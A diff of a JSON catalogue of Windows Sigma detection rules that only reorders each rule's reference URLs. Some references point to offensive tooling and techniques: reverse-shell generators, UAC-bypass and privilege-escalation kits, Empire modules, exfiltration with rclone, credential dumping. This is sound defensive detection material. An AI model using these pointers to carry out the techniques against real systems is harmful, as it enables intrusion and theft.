@@ -42258,8 +42258,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime",
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml"
 ],
 "tags": [
@@ -42283,9 +42283,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://isc.sans.edu/diary/22264",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"
 ],
 "tags": [
@@ -42362,8 +42362,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/",
 "https://github.com/S3cur3Th1sSh1t/SharpImpersonation",
+ "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_impersonation_tool.yml"
 ],
 "tags": [
@@ -42495,11 +42495,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/bohops/status/980659399495741441",
 "https://twitter.com/JohnLaTwC/status/1223292479270600706",
 "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
- "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md",
+ "https://twitter.com/bohops/status/980659399495741441",
+ "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml"
 ],
 "tags": [
@@ -42600,8 +42600,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/",
- "https://twitter.com/bryon_/status/975835709587075072",
 "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15",
+ "https://twitter.com/bryon_/status/975835709587075072",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml"
 ],
 "tags": [
@@ -42801,8 +42801,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/cube0x0",
 "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files",
+ "https://github.com/cube0x0",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml"
 ],
 "tags": "No established tags"
@@ -42823,8 +42823,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
 "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
+ "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml"
 ],
 "tags": [
@@ -42857,10 +42857,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
- "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
 "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/",
+ "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/",
+ "https://twitter.com/Z3Jpa29z/status/1317545798981324801",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csi.yml"
 ],
 "tags": [
@@ -43031,8 +43031,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.nirsoft.net/utils/nircmd.html",
- "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://www.nirsoft.net/utils/nircmd2.html#using",
+ "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd.yml"
 ],
 "tags": [
@@ -43124,10 +43124,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
+ "https://github.com/hfiref0x/UACME",
 "https://twitter.com/hFireF0X/status/897640081053364225",
 "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf",
- "https://github.com/hfiref0x/UACME",
- "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml"
 ],
 "tags": [
@@ -43197,8 +43197,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
 "https://twitter.com/x86matthew/status/1505476263464607744?s=12",
+ "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml"
 ],
 "tags": "No established tags"
@@ -43271,8 +43271,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://twitter.com/AdamTheAnalyst/status/1483497517119590403",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml"
 ],
@@ -43299,8 +43299,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/cyb3rops/status/1186631731543236608",
- "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
 "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
 "https://github.com/Neo23x0/DLLRunner",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml"
 ],
@@ -43435,8 +43435,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md",
 "https://twitter.com/_st0pp3r_/status/1583914515996897281",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml"
 ],
@@ -43604,8 +43604,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://streamable.com/q2dsji",
 "https://twitter.com/j0nh4t/status/1429049506021138437",
+ "https://streamable.com/q2dsji",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml"
 ],
 "tags": [
@@ -43671,8 +43671,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
- "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
 "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windowsoptionalfeature.yml"
 ],
 "tags": [
@@ -43728,8 +43728,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/",
 "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
+ "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml"
 ],
 "tags": [
@@ -43901,10 +43901,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
- "https://twitter.com/0gtweet/status/1583356502340870144",
+ "https://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html",
 "https://lolbas-project.github.io/lolbas/Binaries/Setres/",
+ "https://twitter.com/0gtweet/status/1583356502340870144",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml"
 ],
 "tags": [
@@ -43946,8 +43946,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html",
- "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
 "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone",
+ "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/",
 "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
 "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml"
@@ -43982,8 +43982,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
 "https://twitter.com/vxunderground/status/1423336151860002816?s=20",
+ "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/",
 "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_shadowcopy_access.yml"
 ],
@@ -44017,9 +44017,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/c_APT_ure/status/939475433711722497",
 "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
 "https://twitter.com/haroonmeer/status/939099379834658817",
+ "https://twitter.com/c_APT_ure/status/939475433711722497",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml"
 ],
 "tags": [
@@ -44459,8 +44459,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
 "https://github.com/swagkarna/Defeat-Defender-V1.2.0",
+ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_tampering.yml"
 ],
 "tags": [
@@ -44546,9 +44546,9 @@
 "logsource.product": "windows",
 "refs": [
 "https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
- "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
 "https://twitter.com/gN3mes1s/status/1206874118282448897",
 "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
+ "https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_csc_folder.yml"
 ],
 "tags": [
@@ -44648,8 +44648,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml"
 ],
 "tags": [
@@ -44758,8 +44758,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
 "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
+ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml"
 ],
 "tags": [
@@ -44951,11 +44951,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/egre55/status/1087685529016193025",
 "https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/",
- "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/",
- "https://twitter.com/JohnLaTwC/status/835149808817991680",
 "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/",
+ "https://twitter.com/egre55/status/1087685529016193025",
+ "https://twitter.com/JohnLaTwC/status/835149808817991680",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_command.yml"
 ],
 "tags": [
@@ -45197,8 +45197,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
 "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml"
 ],
 "tags": [
@@ -45266,10 +45266,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://isc.sans.edu/diary/22264",
 "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml"
 ],
 "tags": [
@@ -45361,8 +45361,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/cyb3rops/status/1168863899531132929",
 "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965",
+ "https://twitter.com/cyb3rops/status/1168863899531132929",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml"
 ],
 "tags": [
@@ -45387,9 +45387,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
 "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps",
 "https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE",
+ "https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_disable_feature.yml"
 ],
 "tags": [
@@ -45447,8 +45447,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation",
 "https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx",
+ "https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"
 ],
 "tags": [
@@ -45481,10 +45481,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://isc.sans.edu/diary/22264",
 "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml"
 ],
 "tags": [
@@ -45560,11 +45560,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://pentestlab.blog/2017/04/13/hot-potato/",
- "https://github.com/ohpe/juicy-potato",
- "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
 "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
+ "https://github.com/ohpe/juicy-potato",
+ "https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
+ "https://pentestlab.blog/2017/04/13/hot-potato/",
+ "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tools_relay_attacks.yml"
 ],
 "tags": [
@@ -45631,9 +45631,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.revshells.com/",
 "https://nmap.org/ncat/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
+ "https://www.revshells.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml"
 ],
 "tags": [
@@ -45699,9 +45699,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil",
 "https://abuse.io/lockergoga.txt",
+ "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml"
 ],
 "tags": [
@@ -45727,10 +45727,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
 "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
 "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
+ "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml"
 ],
 "tags": [
@@ -45789,9 +45789,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
 "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
 "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml"
 ],
 "tags": [
@@ -45826,9 +45826,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
- "https://twitter.com/frack113/status/1555830623633375232",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://twitter.com/frack113/status/1555830623633375232",
+ "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_cli.yml"
 ],
 "tags": [
@@ -45927,9 +45927,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://isc.sans.edu/diary/22264",
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml"
 ],
 "tags": [
@@ -46097,11 +46097,11 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/vysecurity/status/885545634958385153",
- "https://twitter.com/Hexacorn/status/885553465417756673",
- "https://twitter.com/Hexacorn/status/885570278637678592",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
 "http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/",
+ "https://twitter.com/Hexacorn/status/885553465417756673",
+ "https://twitter.com/vysecurity/status/885545634958385153",
+ "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://twitter.com/Hexacorn/status/885570278637678592",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cli_escape.yml"
 ],
 "tags": [
@@ -46191,8 +46191,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://processhacker.sourceforge.io/",
 "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/",
+ "https://processhacker.sourceforge.io/",
 "https://github.com/winsiderss/systeminformer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml"
 ],
@@ -46214,8 +46214,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
 "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/",
+ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml"
 ],
 "tags": [
@@ -46295,8 +46295,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install",
 "https://lolbas-project.github.io/lolbas/Binaries/Winget/",
+ "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml"
 ],
 "tags": [
@@ -46385,8 +46385,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
+ "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml"
 ],
 "tags": [
@@ -46730,9 +46730,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
- "https://twitter.com/oulusoyum/status/1191329746069655553",
 "https://twitter.com/mattifestation/status/1196390321783025666",
+ "https://twitter.com/oulusoyum/status/1191329746069655553",
+ "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml"
 ],
 "tags": [
@@ -46809,8 +46809,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
 "https://lolbas-project.github.io/lolbas/Binaries/Findstr/",
+ "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"
 ],
@@ -46861,10 +46861,10 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
- "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
- "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
 "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en",
+ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
+ "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml",
+ "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml"
 ],
 "tags": [
@@ -47167,8 +47167,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/",
 "https://twitter.com/_felamos/status/1179811992841797632",
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml"
 ],
 "tags": [
@@ -47235,9 +47235,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
- "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml"
 ],
 "tags": [
@@ -47294,8 +47294,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
 "https://twitter.com/blackorbird/status/1140519090961825792",
+ "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
